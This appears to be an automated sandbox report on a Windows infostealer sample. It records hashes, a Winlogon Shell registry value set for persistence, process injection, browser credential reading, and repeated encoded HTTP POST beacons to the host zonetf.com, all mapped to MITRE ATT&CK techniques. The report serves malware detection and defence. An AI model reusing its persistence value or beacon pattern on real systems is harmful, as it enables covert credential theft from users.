d339fe36fea6a038e7a1c01913f346ab8afc2d7c0296cdfd01d7f07f56968794

Analysis

max time kernel
142s
max time network
122s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
12/08/2024, 00:00 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe
Size

181KB
MD5

8c83bbfd24398e63747ccfd19d44b472
SHA1

a109f3a9a30e61e791e21a712f741e18579b01b3
SHA256

d339fe36fea6a038e7a1c01913f346ab8afc2d7c0296cdfd01d7f07f56968794
SHA512

c753020641624b390dce6a2406ec5d3cdb133974ccd99cd9fe6c9844ea9a60714e82986c6d11fe5d7675dca837c71af21f174f6dbaf32118dfe1648434046992
SSDEEP

3072:Qde3NE5UxKBK3SLYwMcOnKJdHKunZOvOh55xYFWYXnoEHDUC+wsRyRqdPUH/kv:Ye3i0KBKCLYwE2ZXxxcoEAC+fyRqd6U

Score

10^/10

discovery persistence spyware stealer upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\dwm.exe"	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2988-2-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2000-4-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2000-6-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2988-13-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2428-75-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2428-74-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2988-76-0x0000000000400000-0x0000000000465000-memory.dmp	upx
behavioral1/memory/2988-167-0x0000000000400000-0x0000000000465000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2988 wrote to memory of 2000	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	28
PID 2988 wrote to memory of 2000	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	28
PID 2988 wrote to memory of 2000	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	28
PID 2988 wrote to memory of 2000	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	28
PID 2988 wrote to memory of 2428	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	30
PID 2988 wrote to memory of 2428	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	30
PID 2988 wrote to memory of 2428	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	30
PID 2988 wrote to memory of 2428	2988	8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe	30

C:\Users\Admin\AppData\Local\Temp\8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe"
1⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Users\Admin\AppData\Local\Temp\8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe
  C:\Users\Admin\AppData\Local\Temp\8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2000
- C:\Users\Admin\AppData\Local\Temp\8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe
  C:\Users\Admin\AppData\Local\Temp\8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2428

Network

DNS

historykillerpro.com

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

historykillerpro.com

IN A

Response
DNS

zonetf.com

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

zonetf.com

IN A

Response

zonetf.com

IN A

76.223.54.146

zonetf.com

IN A

13.248.169.48
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAMRu4pVKv975Xlm5G

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAMRu4pVKv975Xlm5G HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
DNS

bigspiderwomen.com

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

bigspiderwomen.com

IN A

Response
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
DNS

smallspiderwomen.com

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

8.8.8.8:53

Request

smallspiderwomen.com

IN A

Response
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
POST

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

Remote address:

76.223.54.146:80

Request

POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonetf.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close

76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAMRu4pVKv975Xlm5G

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

551 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAMRu4pVKv975Xlm5G
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

579 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

579 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

579 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

561 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

579 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

579 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

579 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2Bsq1Sr%2Fe%2BV5ZuRg%3D%3D
76.223.54.146:80

http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

http

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

561 B
172 B
5
4

HTTP Request

POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gGtC5Yiy3nL0GT7iisWufvZqSuf90alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

8.8.8.8:53

historykillerpro.com

dns

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

66 B
139 B
1
1

DNS Request

historykillerpro.com
8.8.8.8:53

zonetf.com

dns

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

56 B
88 B
1
1

DNS Request

zonetf.com

DNS Response

76.223.54.146

13.248.169.48
8.8.8.8:53

bigspiderwomen.com

dns

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

64 B
137 B
1
1

DNS Request

bigspiderwomen.com
8.8.8.8:53

smallspiderwomen.com

dns

8c83bbfd24398e63747ccfd19d44b472_JaffaCakes118.exe

66 B
139 B
1
1

DNS Request

smallspiderwomen.com

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\6066.592

Filesize
1KB

MD5
5fdcbe4367848231883a9c9912986205

SHA1
07057a6632be44df13b92580c3684f6099a9c7ef

SHA256
d3fc693dc312cd1c2bacdcaba7f52b42b178a28f27eff62be371c83f6818e828

SHA512
c3566492b73ac99990a3e983b136d74ef0897816ddee6999fd223909ce561cbfc6ecbb5d9f0e3aeda0b043009544ce670a561973262e1caa1eee66355739c677

Download Submit
C:\Users\Admin\AppData\Roaming\6066.592

Filesize
600B

MD5
df4ffaea07cd58f68412d38a61bb08c0

SHA1
c18ed2dca598844341cbbf7e1699eb3d35cfa8ef

SHA256
393d2da094515d7afb36ea5b55430ef9fffe6b6f3af2f856c999dd315428864d

SHA512
7eab3276c5bde5f0e6a74ae35aeb1d1d85a806c58d7bdcb7ccd06e602ed699a936eaad548fd7c46d351c509d1f28ed8d9101abb4de638e4f135ee920d1298a75

Download Submit
C:\Users\Admin\AppData\Roaming\6066.592

Filesize
996B

MD5
1eab25e0980a1b32de7353aabca03934

SHA1
2b373e5f761542ea44d835a90f481cc433cb71bf

SHA256
5c270ea8e2863f77df8465a691dc7076db800f1e45bd94d6fd3843d71529416b

SHA512
b08f553c330019fa996899fbe0255668c438de79773f42ead51d85def4a77969591ca0aea16660d53fd5ab2c0ad5da50f35ecf4827c486f077c0aba12a38818d

Download Submit
memory/2000-4-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2000-6-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2428-75-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2428-74-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2988-2-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2988-13-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2988-76-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/2988-167-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.